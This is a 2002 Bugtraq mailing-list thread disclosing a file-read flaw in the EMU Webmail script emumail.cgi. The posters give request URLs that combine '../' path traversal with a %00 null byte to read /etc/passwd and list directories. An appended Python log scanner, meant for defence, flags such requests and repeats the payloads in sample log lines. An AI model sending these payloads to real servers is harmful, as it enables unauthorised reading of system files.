Bugtraq mailing list archives

Re: emumail.cgi


From: "MegaHz" <admin () cyhackportal com>
Date: Sat, 6 Apr 2002 15:39:15 +0300

You can also do this:
http://site/emumail.cgi?type=/../../../../../etc/passwd%00

But you cannot do this:
http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

/* 
 * Andreas Constantinides (MegaHz)
 * Admin of cHp (www.cyhackportal.com)
 *
 */


----- Original Message ----- 
From: "N|ghtHawk" <nighthawk () hackers4hackers nl>
To: <bugtraq () securityfocus org>
Sent: Friday, April 05, 2002 3:10 AM
Subject: Re: emumail.cgi


name            : emumail.cgi
date            : 04/04/2002
description     : EMU Webmail: how to check your email from the web.
severity        : Low/average-risk
homepage        : www.emumail.com

Any user can view files on the remote system:
xxx/PATH/emumail.cgi?type=FILE%00



The vendor was contacted about that.


http://site/emumail.cgi?type=.%00

Seems to give the directory index of the current directory.

http://site/emumail.cgi?type=..%00

Seems to give the directory index of ../

-- 
N|ghtHawk
http://www.hackers4hackers.org
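
A log check for the request pattern reported in this thread, as an added example that is not part of the original posts: it scans web access-log lines for emumail.cgi requests whose `type` parameter carries a null byte, a `.`/`..` path segment or an absolute path, including double-encoded forms. The log lines, the /cgi-bin/ location, the benign `type=login` value and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (addresses, paths and the benign
# "type=login" value are made up for illustration).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2002:15:40:01 +0300] "GET /cgi-bin/emumail.cgi?type=login HTTP/1.0" 200 5120',
    '192.0.2.44 - - [06/Apr/2002:15:40:07 +0300] "GET /cgi-bin/emumail.cgi?type=/../../../../../etc/passwd%00 HTTP/1.0" 200 1432',
    '192.0.2.44 - - [06/Apr/2002:15:40:09 +0300] "GET /cgi-bin/emumail.cgi?type=..%00 HTTP/1.0" 200 811',
    '192.0.2.44 - - [06/Apr/2002:15:40:12 +0300] "GET /cgi-bin/emumail.cgi?type=%252e%252e%2500 HTTP/1.0" 200 811',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(raw, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2500) is seen."""
    data = raw.encode("ascii", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def classify(line):
    """Return the reasons a request's `type` parameter looks like a file-read attempt."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/emumail.cgi"):
        return []
    findings = []
    for pair in url.query.split("&"):
        key, _, raw = pair.partition("=")
        if key != "type":
            continue
        value = decode_fully(raw)
        if b"\x00" in value:
            findings.append("null-byte")
        # Assumption: the NUL ends the name at the file-open call, so only
        # the part before it is inspected as a path.
        segments = value.split(b"\x00")[0].replace(b"\\", b"/").split(b"/")
        if b"." in segments or b".." in segments:
            findings.append("dot-segment")
        if value.startswith(b"/"):
            findings.append("absolute-path")
    return findings

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry) or "ok", "<-", entry.split('"')[1])
```

A non-empty result on a request that returned status 200 is worth correlating with the response size, since the thread reports both file contents and directory indexes being returned.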